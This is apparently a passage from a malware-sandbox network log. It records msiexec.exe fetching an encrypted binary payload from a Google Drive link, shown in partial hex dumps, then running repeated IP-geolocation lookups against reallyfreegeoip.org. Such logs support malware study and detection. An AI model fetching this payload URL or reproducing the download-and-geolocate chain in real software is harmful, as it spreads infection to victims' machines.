                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.2.449770172.217.18.144435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:35 UTC216OUTGET /uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_ HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                                                                                  Host: drive.google.com
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2025-02-25 07:27:35 UTC1610INHTTP/1.1 303 See Other
                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:35 GMT
                                                                                                                                                                  Location: https://drive.usercontent.google.com/download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                  Content-Security-Policy: script-src 'nonce-jnv14EMMxQQ47DiGcCZNxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                  Server: ESF
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  1192.168.2.449781142.250.185.1934435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:36 UTC258OUTGET /download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2025-02-25 07:27:39 UTC5014INHTTP/1.1 200 OK
                                                                                                                                                                  X-GUploader-UploadID: AHMx-iH1Ipor44gGR7byYB2_eWW65AymDWPFfsDUq7PJpegVgOPf8hAcNzcpIOQX7RKA2Jyc
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  Content-Disposition: attachment; filename="OWpmXgRvpIM247.bin"
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Content-Length: 276032
                                                                                                                                                                  Last-Modified: Mon, 24 Feb 2025 09:20:11 GMT
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:39 GMT
                                                                                                                                                                  Expires: Tue, 25 Feb 2025 07:27:39 GMT
                                                                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                                                                  X-Goog-Hash: crc32c=KtqWSg==
                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2025-02-25 07:27:39 UTC5014INData Raw: 1d db 82 37 35 28 e8 fc 89 99 c7 2b ec 68 19 a3 50 5b 0f 78 03 af 8d 12 13 c0 3b 8b e8 fd 00 79 bb 87 0e e5 f1 95 24 d6 f7 28 b4 94 78 b0 94 a4 51 cc 32 c0 07 7c a2 0a ce 6b 9e 9d dc 68 58 95 8d 19 ec 84 b7 1c c9 3f 4c f8 63 7b 37 82 28 4e cd df c3 38 54 13 2a bc 77 a3 3b 8b 0c b3 fe f4 63 59 81 10 ca 1c d9 31 41 5f cf 3a 5f eb 01 c7 1c aa 19 26 77 ad 5f a2 57 d6 39 0e 9a 3e 77 bb bd 6e 48 8f eb 91 1d da 6a b4 8f 32 d6 e2 3f f5 c5 a3 df 56 9d d2 b3 63 0f 8b c0 ce 13 af 82 92 c6 80 ee 47 b8 96 ac 16 27 c6 03 4b ce 51 f3 2d 6f 48 5f af 63 53 c9 9c cf 02 9f 6b 1e ec 5e 42 22 68 0c 41 4c b7 41 20 70 5f a7 cb b5 7b 2f a1 87 07 db 74 f6 78 4f 81 d4 ea cf 1b 56 06 ec 8a 1a 85 5c db 0a 8e f0 9b 10 be c3 6a 28 02 28 5a 79 5d 77 98 ae c8 6d 00 4e a0 0d 7c ce 2c 0f
                                                                                                                                                                  Data Ascii: 75(+hP[x;y$(xQ2|khX?Lc{7(N8T*w;cY1A_:_&w_W9>wnHj2?VcG'KQ-oH_cSk^B"hALA p_{/txOV\j((Zy]wmN|,
                                                                                                                                                                  2025-02-25 07:27:39 UTC4672INData Raw: a5 49 e8 95 d2 e6 a9 95 89 55 75 24 13 2b 3c 53 16 97 53 6a 81 b4 f3 64 4d 52 05 79 9a bf e4 d0 38 98 8e a3 f3 47 07 ac ad 8b 9b e1 53 82 e9 61 c9 98 b2 b1 9e 05 00 d5 87 3f 55 c7 a3 71 f1 f1 43 1a 52 fc de 14 c3 36 d5 30 02 83 89 05 95 9b c7 7e d5 c5 cd cc fb 1c ef 73 b6 04 c5 15 03 77 01 d2 af e7 60 6a 05 57 ae 42 90 05 27 4c 24 bc ec 3a 8e c5 cf 89 7c 39 0b af 81 40 fc 18 ef e4 b5 17 01 a1 eb 5b 8f e2 6c e1 98 02 43 a5 63 73 dc 37 4f cb 9f 4f b2 92 68 19 49 db 90 1a 4c f0 31 74 5b 5f 8a 07 48 e5 f9 64 6a c5 ba 03 af 28 b5 f7 24 aa 7a 7a f7 1e 73 b8 f3 4a 61 43 08 cc dc 9d 74 b0 36 25 08 f0 ed a5 9f 18 c6 2a ea 4e 6d 35 93 d3 6f b3 5a 94 22 76 2b f5 51 84 72 bf 2f 91 24 87 2d 4e 8a d5 16 5e 12 63 8d ff 33 65 d5 0b 12 11 c2 52 d4 b5 f1 dd 49 dd bc 92 19
                                                                                                                                                                  Data Ascii: IUu$+<SSjdMRy8GSa?UqCR60~sw`jWB'L$:|9@[lCcs7OOhIL1t[_Hdj($zzsJaCt6%*Nm5oZ"v+Qr/$-N^c3eRI
                                                                                                                                                                  2025-02-25 07:27:39 UTC1321INData Raw: 8c ab 22 63 3d 90 65 64 8f a8 5e 51 5c 96 83 8e 45 74 29 6f 33 76 e0 cd f3 5f a0 56 26 6c 8f 74 1d dc 62 43 c7 b8 61 b1 b9 23 29 c3 10 dd 8e 53 5e e1 62 b4 16 e9 f8 c1 3e 78 24 5e 10 5f 62 f8 2f 76 9a bb de ec 08 59 5c 30 da 02 06 34 91 e0 d1 fb f3 e4 f5 f6 bb f5 4f 16 ed d3 69 77 31 3e 8e f3 61 79 33 73 20 e8 e1 30 f5 af 55 bf f9 24 90 6f c1 8f 58 ec 4d aa 12 8c e7 96 b8 46 ed e2 a2 3a 6a b9 95 6f 10 e6 00 f0 70 03 e8 0e ae a8 46 20 66 a7 e6 b8 54 0c f0 4d e5 0c e4 aa de 41 90 1e 76 a5 b7 e2 ad 9e 98 bf 88 d3 c2 dd e3 a5 65 62 43 af 62 48 ad a7 6a 3c 5c 27 40 99 ce 64 eb 55 ab 57 c2 39 13 86 21 ad 88 a7 f4 5b 7d 0f 9f 7b 48 20 6f 7d 46 e6 e5 8f 7c 33 e6 7e 30 83 59 57 4a a5 ce f0 80 98 a1 65 23 5b ac 7f ea d3 66 6f 6c 2c 84 f9 31 2d 94 7f 96 2d d5 b4 c2
                                                                                                                                                                  Data Ascii: "c=ed^Q\Et)o3v_V&ltbCa#)S^b>x$^_b/vY\04Oiw1>ay3s 0U$oXMF:jopF fTMAvebCbHj<\'@dUW9![}{H o}F|3~0YWJe#[fol,1--
                                                                                                                                                                  2025-02-25 07:27:39 UTC1390INData Raw: 6b d2 d8 a3 a8 bf ce 8f 71 e1 c4 33 10 64 53 62 af 21 18 94 a6 e5 7e 8d fa 93 fc 2b 5a a6 fa 52 6d c7 64 9d 14 63 43 cc e7 7a 02 7d 79 56 78 34 b2 e3 cf ce c0 9e e3 33 df 0c 93 a9 41 2c 25 77 89 fd 42 13 b0 cd e8 87 47 38 83 83 72 50 53 17 04 db d8 d6 e8 d0 0b d0 4e 18 ed 62 b8 6e 29 6d c8 8c 40 13 9f bf ac 4c 39 a8 5e 5b 80 87 9b fc 1f 09 7e 1d 91 23 ef 9b 48 5f a0 58 92 b7 94 15 bf c2 42 0a ab 9d 7a cf bb 79 29 c7 b8 e5 1f 60 ce ee 63 e1 a2 b3 cb ce 3e 02 e9 27 07 77 de f5 27 75 b6 f7 ac f1 96 56 5c 4a 78 27 17 25 68 e0 d1 f5 42 c5 fe 80 30 ec 46 e8 26 99 2c 09 1b 34 8e e6 c7 33 83 01 b0 ed e1 9e 59 87 33 bb d5 26 ee 37 ae 8e 52 ff 66 b1 43 13 f4 b3 91 57 fb 90 6c 3b 6f c9 1f 28 07 ce bc 2d 1a 0f 4a 2b b6 da 18 51 54 d7 44 99 3f 25 ca 4d 95 1e 6e 0c c4
                                                                                                                                                                  Data Ascii: kq3dSb!~+ZRmdcCz}yVx43A,%wBG8rPSNbn)m@L9^[~#H_XBzy)`c>'w'uV\Jx'%hB0F&,43Y3&7RfCWl;o(-J+QTD?%Mn
                                                                                                                                                                  2025-02-25 07:27:39 UTC1390INData Raw: bb e3 75 41 4e bb 50 3e 41 b7 a3 a5 55 7f 74 aa 15 35 7b 54 6e 24 cd 09 40 c7 15 61 8a 1e 86 bf 9d 78 fc b3 eb 66 1c 1b 10 be 75 d1 6b ba b1 bb be 0b 8d fa 93 31 ca 40 d4 b4 40 7c b1 a9 70 63 63 49 b8 78 52 75 79 16 9a 6b 2a ca 93 cc c8 c2 8a ec 33 af 20 0d e0 41 26 5d 85 01 ef 32 4b c3 8e e8 8d 2e ee 9d 92 6c 78 07 11 1f 50 99 0b 9f d0 2e c6 19 82 ca 62 c8 c6 1f 65 e0 12 22 13 95 17 57 54 4b f6 51 5b 8e 11 be e5 65 43 29 1f 95 f1 dc a9 b9 91 b0 52 f4 eb bd 71 9f d3 68 5c ad 9d 7a c5 93 5d 02 c7 b2 fc e1 cc ce ee 68 d7 b3 d0 89 ae ef 72 4b 08 01 58 07 26 27 7f 1e d2 ca bf c8 59 58 49 13 02 0e 51 43 e8 af c0 e0 e0 e0 80 e5 e1 46 e8 92 94 b4 77 31 3e 98 1c 64 05 96 62 29 ce ed ff f3 b8 2b 71 d5 2c 8b 6b ae a5 53 ec 56 a2 d8 3d 3e b3 90 78 ed e2 b9 21 11 87
                                                                                                                                                                  Data Ascii: uANP>AUt5{Tn$@axfuk1@@|pccIxRuyk*3 A&]2K.lxP.be"WTKQ[eC)Rqh\z]hrKX&'YXIQCFw1>db)+q,kSV=>x!
                                                                                                                                                                  2025-02-25 07:27:39 UTC1390INData Raw: ff cd 68 11 1e 13 b5 13 20 20 8b 52 01 fc 6c ee 12 a0 9c f5 8d 53 1a 34 37 81 26 bb e3 6c 67 b4 ba 1f 3b 50 b2 85 e2 54 6e 74 b7 8c 8a 7d 69 6f 01 dd 08 cf d3 15 1b 00 5f 91 97 21 78 8f 7b 49 43 0e 7a 48 a0 73 df f3 9f a8 c1 f5 c8 8d fe 3b 7b 14 32 56 b1 40 1d 15 e3 ae 1d 7f 43 c6 41 3d 9b 7d 79 56 c9 0f dc e1 c5 da b0 90 5e 1b a8 08 bb ea 4a 04 98 05 11 e5 45 0c c4 8e e8 8d 4d 21 97 b9 66 7e 3c 0c 34 d4 d8 dd 98 d1 0b f0 6b 30 c8 62 c6 78 3a 72 cc cb cc 13 9f bf 00 16 38 a8 2e 4d d6 30 9b fc 11 6d d7 1c 9b 55 c0 07 cc 5f a0 2c b7 49 95 02 ed 84 60 33 15 8b 52 4c 93 23 23 d1 4c f9 99 26 f7 ca 63 c4 b4 d5 5f 97 3e 72 4a 2a 3d 5f 68 ff 55 5d 04 d2 c4 94 45 5a 5c 3a db 27 18 25 14 e0 d1 f5 c8 e4 e4 f2 b4 8c fd 98 84 b6 45 8f 25 34 fe ca 3e 16 9f 79 5e a9 e1
                                                                                                                                                                  Data Ascii: h RlS47&lg;PTnt}io_!x{ICzHs;{2V@CA=}yV^JEM!f~<4k0bx:r8.M0mU_,I`3RL##L&c_>rJ*=_hU]EZ\:'%E%4>y^
                                                                                                                                                                  2025-02-25 07:27:39 UTC1390INData Raw: c8 52 c7 a1 80 09 42 b9 b6 8f 0f ed 3d 18 96 d9 a7 ce 29 5b 21 cb 72 fb 0f 84 bf e3 9f ba 3d 18 31 c4 04 52 06 9a 78 71 d5 2a ee 12 ab 8f ec 9c c2 f6 59 3c 0b 56 d4 35 7f 57 ba ba 6b 61 50 b2 90 f3 43 10 28 aa 01 c1 6e 70 7f 3c b9 02 32 c7 65 04 75 7a 86 b5 97 69 97 60 f2 e8 7f 62 79 77 73 af 5b ba a0 a7 a2 11 8d fa 93 4d 14 51 ce af 59 7b a6 df 3b 0a 0c 1d c6 45 58 75 6c 63 33 c7 2a c0 99 dd df a8 8f 26 33 df 02 a8 fb 50 37 40 7e 11 ef 48 70 82 9f f2 f4 ea 29 9d 98 75 64 07 0b 6b a0 d8 0b 95 c2 16 c1 77 5f 74 62 b8 6e 3a 63 d2 cb 8e 13 9f bf 72 5d 22 c7 85 5b fe b9 9b fc 23 b8 29 1f 91 53 f9 a5 e3 27 a0 52 8e 49 b5 06 93 d3 62 1b 1c 9d 7a c5 93 3f a4 86 b2 f8 93 04 d8 9c ff cf b4 b1 a7 83 3e 72 4d a0 35 48 16 b0 27 7f 10 70 91 9b ba e5 4d 3a aa 2a 4f 5b
                                                                                                                                                                  Data Ascii: RB=)[!r=1Rxq*Y<V5WkaPC(np<2euzi`byws[MQY{;EXulc3*&3P7@~Hp)udkw_tbn:cr]"[#)S'RIbz?>rM5H'pM:*O[
                                                                                                                                                                  2025-02-25 07:27:39 UTC1390INData Raw: 54 f9 e1 45 9a 50 dd 23 91 29 df ae 49 e5 d5 1d 5e 1f 11 31 e9 19 15 ba b6 13 25 c8 52 d1 cb ea dd 42 bd c2 df 19 9f 2d 7a 28 a9 d9 e9 46 e4 25 b9 62 ea 27 ae ae f5 bd 72 b0 59 3b d7 12 05 3c f9 74 17 fd 0c 4c 37 b6 b4 42 8d da 8e 96 1e 13 54 e5 ec 7f 27 12 9f 5a 45 68 b2 9a e6 f6 5a 6e d8 3a c8 7d 19 cc 01 d0 04 03 c7 15 6f 00 5f 9a cd 8f 6e 8f 01 49 4e 61 08 16 a5 1c f3 51 ba bb b3 ca c0 03 93 f3 31 ce 40 d4 b4 40 6d b0 a9 74 63 63 49 cb 4c 5a 63 75 f7 35 04 74 c0 93 d7 ce b9 8f 50 33 df 02 bb 3e 4d 2c 26 29 16 e6 2d 62 98 8e e2 87 9d f7 8e b7 4e 4c 16 17 0e ce dc 0b b7 b3 0b d0 61 ed b6 64 b8 64 3a 72 c8 da 10 13 9f b1 00 1b 3b a8 2e 4d d6 30 9b fc 11 6d d7 1e 82 56 e8 b6 f2 89 a2 52 84 37 ba 06 9f d7 10 02 67 9d 0a d9 bb a0 29 c7 b8 ee 6c 20 dd e8 73
                                                                                                                                                                  Data Ascii: TEP#)I^1%RB-z(F%b'rY;<tL7BT'ZEhZn:}o_nINaQ1@@mtccILZcu5tP3>M,&)-bNLadd:r;.M0mVR7g)l s
                                                                                                                                                                  2025-02-25 07:27:39 UTC1390INData Raw: a2 f8 ce da c3 b0 36 25 aa 09 2b d9 49 1f c2 76 40 7a 70 72 24 d3 6f b3 f8 6d 31 2c 1f e7 51 fe da 49 54 91 23 a1 88 61 92 d4 16 54 0b 7c 23 e9 0e 65 a5 75 0c 25 c2 56 fe fc a8 dd 48 cb 24 8e 19 ef 01 4a 96 a9 df f2 36 4a 30 91 2d ea 0f f2 ae 28 c2 6e 3d 18 1e ff 27 20 2a 81 6b 21 fd 54 8c 12 a1 96 2a 8d da 84 34 3b 75 12 bb e3 7b 25 e7 b8 43 4b 46 9a 19 e2 54 75 62 54 00 d8 5c 78 4f 1d 05 7a 23 c7 3d 31 a2 7a 8c a2 1a 39 8f 71 ea 43 00 7a 1a b9 73 df f3 9f a6 97 7b c8 8d f0 3b 7b 16 32 8a b1 40 1d 15 e3 ac 1d 5b 43 c6 41 f0 50 67 0b 67 68 2a b0 31 f8 d5 ce c0 fc 33 db aa 9e fc 33 34 39 05 61 4d 6a 14 98 8e e2 e8 1d 29 9d 98 75 5a 0d 9a 45 dd d8 0a ba c7 79 fa 7c 30 a9 c0 9d 73 12 c4 c8 a4 28 b1 ba ad 00 12 36 a8 2e f9 db aa e5 c4 1b 7b 2d bd b4 49 8b 88
                                                                                                                                                                  Data Ascii: 6%+Iv@zpr$om1,QIT#aT|#eu%VH$J6J0-(n=' *k!T*4;u{%CKFTubT\xOz#=1z9qCzs{;{2@[CAPggh*13349aMj)uZEy|0s(6.{-I
                                                                                                                                                                  2025-02-25 07:27:39 UTC1390INData Raw: 4e 86 59 c0 e4 ff 7b 43 9e ba 09 a5 9b 63 f3 4b cf 7a 6b f1 61 a1 a0 f3 2b 4c d9 00 dd d3 80 31 a2 36 5f 20 77 33 ab 95 66 0a 06 e2 55 69 72 e6 d3 6f bf 49 45 03 2b 5b f5 57 9d 76 70 2e e2 f3 ab 2a 43 f6 db 07 50 6b b3 51 f9 13 76 c5 1a 1f 4a 13 52 d6 bf b9 d2 30 01 aa 9c 69 e1 36 09 96 ad f1 aa 29 5b 2f cb 84 fa 0f 84 dd 27 b7 6f 37 77 e8 d7 13 2a 2a 9a 74 6e 2c 7c ee 18 b0 8c 86 41 cc 84 44 45 14 26 bb e7 57 1e b0 ba 49 49 bc a2 9a 92 27 ad 74 aa 0b a4 ae 69 6e 2e cb 04 1f c7 15 6f d1 b3 86 bf 9d 6b 9e 0f da 66 16 0c 64 f8 71 af 21 ac 99 3c cd c8 87 ec 67 5f 1d 52 c5 ac 6c 61 a6 d7 a2 0c a9 43 c6 4f 52 75 56 72 5c 7a 3b d6 fc 17 ce b0 ea fc 33 ce 19 c5 de 41 2c 2b 2d da ef 42 69 f7 42 e8 87 4b 29 8c 83 18 42 16 17 00 a3 e3 0b 9f d5 78 6e 6b 30 d3 0d 75
                                                                                                                                                                  Data Ascii: NY{CcKzka+L16_ w3fUiroIE+[Wvp.*CPkQvJR0i6)[/'o7w**tn,|ADE&WII'tin.okfdq!<g_RlaCORuVr\z;3A,+-BiBK)Bxnk0u


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  2192.168.2.449818104.21.96.14435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:42 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2025-02-25 07:27:42 UTC858INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:42 GMT
                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Age: 104191
                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                                  last-modified: Mon, 24 Feb 2025 02:31:11 GMT
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cttVAsiDdjzIaTj7HOry1otT0EtjpIaGvtP%2FcpJUHI4%2Bf%2Bp3z7RfGGu1HUkaQmZI2rfqaTGd9DOrIQpOIapWLhWYTFd0OjO9BDg%2FDdzvWAKiz9IKn7tH1YWsT%2B7eVteZTk7B8bk2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9175f9711c6572a4-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1975&rtt_var=753&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1441263&cwnd=214&unsent_bytes=0&cid=c7eacf94c1cb7a5c&ts=164&x=0"
                                                                                                                                                                  2025-02-25 07:27:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  3192.168.2.449828104.21.96.14435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:43 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                  2025-02-25 07:27:43 UTC850INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:43 GMT
                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Age: 104192
                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                                  last-modified: Mon, 24 Feb 2025 02:31:11 GMT
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0sK0pfK01rKXGbCHvnVjPOBDRDTbJLtdwrLTqqKrA2GN5dAawC3oaDD9URRNcZfmmbnaDPX4BSmkI46m1M712wK7DyDNIR5eHQjQc1k7pbVFa%2FmIE2lien5saWbQWr5xqKLATW4E"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9175f9763c4c1a48-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1926&rtt_var=734&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1478481&cwnd=183&unsent_bytes=0&cid=84d1158b47ec076b&ts=136&x=0"
                                                                                                                                                                  2025-02-25 07:27:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  4192.168.2.449836104.21.96.14435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:44 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2025-02-25 07:27:44 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:44 GMT
                                                                                                                                                                  Content-Type: text/xml
